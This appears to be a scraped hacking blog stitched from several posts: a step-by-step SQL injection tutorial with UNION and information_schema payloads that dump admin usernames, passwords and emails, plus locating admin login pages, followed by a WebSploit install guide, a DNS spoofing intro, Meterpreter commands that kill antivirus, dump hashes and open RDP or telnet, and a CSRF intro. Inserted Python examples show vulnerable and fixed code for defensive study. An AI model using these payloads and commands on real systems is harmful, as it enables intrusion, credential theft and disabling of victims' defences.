Code:

http://www.thesite.com/page.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

Code:

http://www.thesite.com/page.php?id=1'

or

http://www.thesite.com/page.php?id='1

After pressing enter, if this website returns an error such as the following:

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5

Or something similar, this means it's vulnerable to injection.

Determining the amount of columns

If we want to use commands and get results we must know how many columns there are on a website.

To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:

http://www.thesite.com/page.php?id=1 ORDER BY 1-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 2-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 3-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 4-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 5-- <---ERROR!

This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE DASH (--) AFTER THE QUERY; IT COMMENTS OUT THE REST OF THE ORIGINAL STATEMENT.

VERY IMPORTANT!

Finding which columns are vulnerable

So we know that there are four columns; now we have to find out which ones are vulnerable to injection. To do this we will use the UNION and SELECT queries while keeping the double dash (--) at the end of the string.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,2,3,4--

Don't forget to put the extra minus sign (-) in between the "=" sign and the value (the number), so that the original row is not returned and the row from the UNION is shown instead:

page.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.
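Part One as a runnable lab, added here as an editor's example and not the tutorial's own code: page_vulnerable builds its query by string concatenation exactly as a page.php?id= script does, so the tutorial's single-quote probe raises a database error, ORDER BY n probing recovers the column count (4 here), and the UNION query returns attacker-chosen values and then rows from another table. page_safe is the fix: the value is bound as a parameter, so the same inputs are treated as data and match nothing. SQLite stands in for MySQL with constructed tables, so the @@version and information_schema queries of Part Two do not apply to it (sqlite_master is the equivalent catalogue).

```python
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE page (id INTEGER, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO page VALUES (1, 'Home', 'Welcome', 'editor')")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'hashed-secret')")
    return db


def page_vulnerable(db, user_id):
    """The page.php?id= pattern: the parameter is pasted into the SQL text,
    so whatever the client sends becomes part of the statement."""
    sql = "SELECT id, title, body, author FROM page WHERE id=" + user_id
    return db.execute(sql).fetchall()


def page_safe(db, user_id):
    """Hardened form: the value is bound as a parameter and can only ever be
    compared with the id column, never parsed as SQL."""
    sql = "SELECT id, title, body, author FROM page WHERE id=?"
    return db.execute(sql, (user_id,)).fetchall()


def probe_error(db, payload):
    """The tutorial's first test: does the payload make the query fail?"""
    try:
        page_vulnerable(db, payload)
        return False
    except sqlite3.Error:
        return True


def count_columns(db, max_cols=10):
    """ORDER BY n probing: the first n that errors means there are n-1 columns."""
    for n in range(1, max_cols + 1):
        if probe_error(db, f"1 ORDER BY {n}--"):
            return n - 1
    return None
```

The error the tutorial watches for (`mysql_fetch_array(): supplied argument is not a valid MySQL result resource`) is the PHP side of what `probe_error` catches here; a hardened site would both bind parameters and stop echoing database errors to the browser.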

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4.

If we look back to the end of Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2 as an example). The command should look like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method is used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Code:

5.1.44-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Finding the database

To find the database we use a query like the one below:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,concat(database()),3,4--

You now have the name of the database! Congratulations. Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Part

This is the fun part where we will find the usernames, emails and passwords!

Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because LIMIT starts counting from 0, so 30,1 is actually the 31st table.

You now have all the table names!

Finding the column names

Now that you have all of the table names, try to pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on, but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error, but don't panic if it is outcome #2! All this means is that magic quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.

2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".

Hex/Char Converter

http://www.swingnote.com/tools/texttohex.php

3. Click convert.

4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:), which groups the username:password:email for each individual user just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page, which brings us to the next section.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:

http://www.thesite.com/admin

http://www.thesite.com/adminlogin

http://www.thesite.com/modlogin

http://www.thesite.com/moderator

Once again there are programs that will find the page for you, but first try some of the basic guesses; it might save you a couple of clicks. If you do use a program, Reiluke has coded one for that as well: search for Admin Finder by Reiluke.

And that concludes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

How To use Websploit?


Hey, here is a new tool which I found: WEBSPLOIT. First download WEBSPLOIT from here. Now install it. (This is an old article; see the updated part at the bottom to download the latest version.)

The installation process is as follows.

(1)First download the WebSploit toolkit.
(2)Now unzip the folder.
(3)Now change the permissions of the websploit file in the WebSploit folder: right-click the websploit file and select Properties.
(4)Select the Permissions tab, tick "Allow executing file as program" and click Close.
(5)Now open your terminal and type
    cd /Downloads/web/websploit
    ./websploit

Now open a terminal and type websploit.
websploit

Saturday, November 3, 2012

How to do DNS spoofing (tutorial)?


First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. For example, http://www.example.com translates to 208.77.188.166.

What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.
First, this is the structure of the network:

Friday, November 2, 2012

Some cool Metasploit Meterpreter scripts


Getcountermeasure
Getcountermeasure is an automated script that disables security measures such as antivirus, firewall, and more.
Command:- run getcountermeasure

Getgui
getgui script is used to enable RDP on a target system.
Command:- run getgui -e

GetTelnet
gettelnet script is used to enable telnet on the victim.
Command:- run gettelnet -e

Winenum
Winenum script is used to dump tokens, hashes.
Command:- run winenum

Getlocalsubnet
getlocalsubnet script is used to get the local subnet mask of a victim.
Command:- run get_local_subnets

Killav
Killav used to disable most antivirus programs.
Command:- run killav

Checkvm
Checkvm is used to see whether you exploited a virtual machine.
Command:- run checkvm

Sunday, October 28, 2012

How to exploit a CSRF vulnerability (CSRF tutorial)?

Today I'm going to explain a web vulnerability that not everyone knows about, but which is very common. This vulnerability is very dangerous and effective. Usually, exploiting it leaves no evidence. This vulnerability is called Cross Site Request Forgery (CSRF). CSRF, and the way to exploit it, is extremely easy; much easier than all the complicated injections.

How does it work?

It works by forcing the victim's browser to send HTTP requests in order to perform a range of actions, for example:
  • Permission faking/stealing.
  • Transfer of funds from the bank.
  • Disruption of the normal sequence of the site.
And much more.
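To make the mechanism concrete, here is an editor's added Python example (not from the post) of a fund-transfer handler in both forms. transfer_vulnerable trusts the session cookie alone, so any request the browser can be made to send, such as an auto-submitted form on another site, is processed; transfer_protected additionally requires a synchronizer token tied to the session with an HMAC, which a page on another origin cannot read and therefore cannot include. The session store and server key are constructed. The token is issued to the page by the server and submitted back in the form body; the comparison must be constant-time, and the SameSite cookie attribute is a complementary browser-side defence.

```python
import hashlib
import hmac
import secrets

# Constructed server-side state: one signing key and one logged-in session.
SERVER_KEY = secrets.token_bytes(32)
SESSIONS = {"sess-abc": {"user": "alice", "balance": 100}}


def csrf_token(session_id):
    """Token bound to the session; cannot be computed without SERVER_KEY."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(session_id, amount):
    """Acts on the session cookie alone: a forged cross-site request succeeds
    because the browser attaches the cookie to any request it sends."""
    session = SESSIONS[session_id]
    session["balance"] -= amount
    return session["balance"]


def transfer_protected(session_id, amount, submitted_token):
    """Synchronizer-token check: the form must carry a value the attacker's
    page cannot read, so a cross-origin forged request is refused."""
    expected = csrf_token(session_id)
    if submitted_token is None or not hmac.compare_digest(expected, submitted_token):
        raise PermissionError("CSRF token missing or invalid")
    session = SESSIONS[session_id]
    session["balance"] -= amount
    return session["balance"]


def forged_request_accepted(session_id, amount, token):
    """True if a request carrying `token` (None for a forged cross-site post)
    is processed by the protected handler."""
    try:
        transfer_protected(session_id, amount, token)
        return True
    except PermissionError:
        return False
```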